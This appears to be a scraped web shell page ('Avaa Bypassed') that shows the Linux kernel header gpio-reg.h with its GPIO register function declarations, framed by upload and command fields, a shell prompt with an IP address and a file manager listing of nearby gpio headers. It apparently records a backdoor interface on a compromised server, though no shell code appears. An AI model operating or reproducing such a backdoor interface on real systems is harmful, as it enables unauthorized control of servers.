404

[ Avaa Bypassed ]




Upload:

Command:

botdev@3.22.71.254: ~ $
/* SPDX-License-Identifier: GPL-2.0 */
#ifndef GPIO_REG_H
#define GPIO_REG_H

struct device;
struct irq_domain;

struct gpio_chip *gpio_reg_init(struct device *dev, void __iomem *reg,
	int base, int num, const char *label, u32 direction, u32 def_out,
	const char *const *names, struct irq_domain *irqdom, const int *irqs);

int gpio_reg_resume(struct gpio_chip *gc);

#endif

Filemanager

Name Type Size Permission Actions
consumer.h File 14.34 KB 0644
driver.h File 17.1 KB 0644
gpio-reg.h File 375 B 0644
machine.h File 2.41 KB 0644